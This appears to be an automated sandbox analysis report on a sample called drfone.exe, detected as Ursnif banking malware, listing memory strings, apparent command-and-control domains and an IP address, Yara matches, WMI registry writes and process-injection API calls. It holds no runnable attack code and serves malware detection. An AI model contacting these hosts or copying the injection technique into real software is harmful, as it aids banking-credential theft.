Source: explorer.exe, 00000027.00000002.726154750.00000000045BE000.00000004.00000001.sdmp String found in binary or memory: https://45.142.215.100/index.html7
Source: powershell.exe, 00000020.00000002.517801949.00000276D5EE5000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000020.00000002.517801949.00000276D5EE5000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000020.00000002.517801949.00000276D5EE5000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000020.00000002.509231908.00000276C608F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: drfone.exe String found in binary or memory: https://hapynewyear.xyz
Source: imagestore.dat.6.dr, imagestore.dat.5.dr String found in binary or memory: https://hapynewyear.xyz/favicon.ico
Source: explorer.exe, 00000027.00000000.499591103.000000000D4F9000.00000004.00000001.sdmp, ~DF11859F0CE418C879.TMP.5.dr String found in binary or memory: https://hapynewyear.xyz/index.htm
Source: explorer.exe, 00000027.00000000.499591103.000000000D4F9000.00000004.00000001.sdmp String found in binary or memory: https://hapynewyear.xyz/index.htm(
Source: explorer.exe, 00000027.00000000.499591103.000000000D4F9000.00000004.00000001.sdmp String found in binary or memory: https://hapynewyear.xyz/index.htm6
Source: explorer.exe, 00000027.00000000.499591103.000000000D4F9000.00000004.00000001.sdmp String found in binary or memory: https://hapynewyear.xyz/index.htm8
Source: explorer.exe, 00000027.00000000.499591103.000000000D4F9000.00000004.00000001.sdmp String found in binary or memory: https://hapynewyear.xyz/index.htmJ
Source: {62186B8C-460C-11EB-90E5-ECF4BB2D2496}.dat.5.dr String found in binary or memory: https://hapynewyear.xyz/index.htmRoot
Source: explorer.exe, 00000027.00000000.499591103.000000000D4F9000.00000004.00000001.sdmp String found in binary or memory: https://hapynewyear.xyz/index.htmr
Source: explorer.exe, 00000027.00000000.499591103.000000000D4F9000.00000004.00000001.sdmp String found in binary or memory: https://hapynewyear.xyz/index.htmz
Source: {62186B8C-460C-11EB-90E5-ECF4BB2D2496}.dat.5.dr String found in binary or memory: https://hapynewyear.xyz/index.htmz/index.htm
Source: powershell.exe, 00000020.00000002.517801949.00000276D5EE5000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: drfone.exe String found in binary or memory: https://sectigo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.348748393.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430319768.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349342802.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348465665.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349241106.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348544234.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349447113.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349510962.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349495954.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348922196.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430336469.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348235899.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348681532.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349069504.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.504554057.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349393384.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348075019.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349414993.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430159099.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349162984.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396402042.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349022364.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348869581.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349465567.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389630441.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.416634770.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348813448.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.383185635.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349203884.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430074688.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348389706.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348613375.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348156130.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.347990018.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349275689.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348315452.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.429874583.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.347903589.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349306914.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349115327.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.403082199.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349368664.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348972194.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: drfone.exe PID: 7072, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.348748393.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430319768.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349342802.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348465665.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349241106.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348544234.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349447113.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349510962.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349495954.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348922196.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430336469.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348235899.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348681532.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349069504.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.504554057.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349393384.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348075019.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349414993.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430159099.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349162984.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396402042.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349022364.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348869581.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349465567.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389630441.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.416634770.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348813448.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.383185635.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349203884.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430074688.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348389706.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348613375.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348156130.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.347990018.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349275689.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348315452.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.429874583.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.347903589.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349306914.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349115327.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.403082199.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349368664.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348972194.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: drfone.exe PID: 7072, type: MEMORY

System Summary:

Writes or reads registry keys via WMI
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE0881CC NtCreateKey, 32_2_00000276DE0881CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08545C NtQueryInformationToken,NtQueryInformationToken, 32_2_00000276DE08545C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE085290 NtOpenFile, 32_2_00000276DE085290
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08590C NtQueryInformationProcess,NtSuspendProcess,NtResumeProcess,NtUnmapViewOfSection, 32_2_00000276DE08590C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE089368 NtCreateSection, 32_2_00000276DE089368
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08376C NtQueryInformationProcess, 32_2_00000276DE08376C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE088D78 CheckRemoteDebuggerPresent,NtSetInformationProcess, 32_2_00000276DE088D78
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08118C NtMapViewOfSection, 32_2_00000276DE08118C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE0815A4 NtQueryInformationProcess,NtWriteVirtualMemory, 32_2_00000276DE0815A4
Source: C:\Windows\explorer.exe Code function: 39_2_0280645C NtQueryInformationToken,NtQueryInformationToken, 39_2_0280645C
Source: C:\Windows\explorer.exe Code function: 39_2_028170B6 NtProtectVirtualMemory,NtProtectVirtualMemory, 39_2_028170B6
Source: C:\Windows\explorer.exe Code function: 39_2_02986094 NtProtectVirtualMemory, 39_2_02986094
Source: C:\Windows\explorer.exe Code function: 39_2_029838B0 NtQueryValueKey,NtQueryValueKey, 39_2_029838B0
Source: C:\Windows\explorer.exe Code function: 39_2_0298B438 NtSetValueKey,NtClose, 39_2_0298B438
Source: C:\Windows\explorer.exe Code function: 39_2_029891CC NtCreateKey,RtlpNtOpenKey, 39_2_029891CC
Source: C:\Windows\explorer.exe Code function: 39_2_0298476C NtQueryInformationProcess, 39_2_0298476C
Source: C:\Windows\explorer.exe Code function: 39_2_02DB1B94 NtQuerySystemInformation,RtlReleasePrivilege,RtlAllocateHeap, 39_2_02DB1B94
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08DE18 32_2_00000276DE08DE18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08545C 32_2_00000276DE08545C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE0815A4 32_2_00000276DE0815A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE0901E2 32_2_00000276DE0901E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE0811E8 32_2_00000276DE0811E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08C818 32_2_00000276DE08C818
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE087A8C 32_2_00000276DE087A8C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE0878B0 32_2_00000276DE0878B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE087100 32_2_00000276DE087100
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE085F58 32_2_00000276DE085F58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08E998 32_2_00000276DE08E998
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD02CD4413 32_2_00007FFD02CD4413
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD02CD30F0 32_2_00007FFD02CD30F0
Source: C:\Windows\explorer.exe Code function: 39_2_00AA1CE8 39_2_00AA1CE8
Source: C:\Windows\explorer.exe Code function: 39_2_00AA2618 39_2_00AA2618
Source: C:\Windows\explorer.exe Code function: 39_2_00AA3FFC 39_2_00AA3FFC
Source: C:\Windows\explorer.exe Code function: 39_2_00AA4D34 39_2_00AA4D34
Source: C:\Windows\explorer.exe Code function: 39_2_00AA1474 39_2_00AA1474
Source: C:\Windows\explorer.exe Code function: 39_2_0280645C 39_2_0280645C
Source: C:\Windows\explorer.exe Code function: 39_2_02808A8C 39_2_02808A8C
Source: C:\Windows\explorer.exe Code function: 39_2_028088B0 39_2_028088B0
Source: C:\Windows\explorer.exe Code function: 39_2_0280D818 39_2_0280D818
Source: C:\Windows\explorer.exe Code function: 39_2_0280EE18 39_2_0280EE18
Source: C:\Windows\explorer.exe Code function: 39_2_0280F998 39_2_0280F998
Source: C:\Windows\explorer.exe Code function: 39_2_028025A4 39_2_028025A4
Source: C:\Windows\explorer.exe Code function: 39_2_028021E8 39_2_028021E8
Source: C:\Windows\explorer.exe Code function: 39_2_02808100 39_2_02808100
Source: C:\Windows\explorer.exe Code function: 39_2_02806F58 39_2_02806F58
Source: C:\Windows\explorer.exe Code function: 39_2_02822E4C 39_2_02822E4C
Source: C:\Windows\explorer.exe Code function: 39_2_02988A8C 39_2_02988A8C
Source: C:\Windows\explorer.exe Code function: 39_2_029888B0 39_2_029888B0
Source: C:\Windows\explorer.exe Code function: 39_2_0298D818 39_2_0298D818
Source: C:\Windows\explorer.exe Code function: 39_2_0298EE18 39_2_0298EE18
Source: C:\Windows\explorer.exe Code function: 39_2_0298645C 39_2_0298645C
Source: C:\Windows\explorer.exe Code function: 39_2_0298F998 39_2_0298F998
Source: C:\Windows\explorer.exe Code function: 39_2_029825A4 39_2_029825A4
Source: C:\Windows\explorer.exe Code function: 39_2_029821E8 39_2_029821E8
Source: C:\Windows\explorer.exe Code function: 39_2_02988100 39_2_02988100
Source: C:\Windows\explorer.exe Code function: 39_2_02986F58 39_2_02986F58
Source: C:\Windows\explorer.exe Code function: 39_2_02DB58F4 39_2_02DB58F4
Source: C:\Windows\explorer.exe Code function: 39_2_02DBC2BC 39_2_02DBC2BC
Source: C:\Windows\explorer.exe Code function: 39_2_02DBD85C 39_2_02DBD85C
Source: C:\Windows\explorer.exe Code function: 39_2_02DB2008 39_2_02DB2008
Source: C:\Windows\explorer.exe Code function: 39_2_02DBAE0C 39_2_02DBAE0C
Source: C:\Windows\explorer.exe Code function: 39_2_02DBCDCC 39_2_02DBCDCC
Source: C:\Windows\explorer.exe Code function: 39_2_02DBB7E8 39_2_02DBB7E8
Source: C:\Windows\explorer.exe Code function: 39_2_02DBD760 39_2_02DBD760
Source: C:\Windows\explorer.exe Code function: 39_2_02DBA914 39_2_02DBA914
PE / OLE file has an invalid certificate
Source: drfone.exe Static PE information: invalid certificate
PE file does not import any functions
Source: r1g0ykja.dll.36.dr Static PE information: No import functions for PE file found
Source: xqhvpwja.dll.33.dr Static PE information: No import functions for PE file found
Source: classification engine Classification label: mal100.bank.troj.evad.winEXE@38/75@15/2
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{62186B86-460C-11EB-90E5-ECF4BB2D2496}.dat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{AAEAB402-F749-8C7A-9884-AA0F7D514646}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_01
Source: C:\Users\user\Desktop\drfone.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\1978EE24-ED7A-8F95-C655-46BAE5CC03A0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DFA3603797F71A738A.TMP
Source: drfone.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
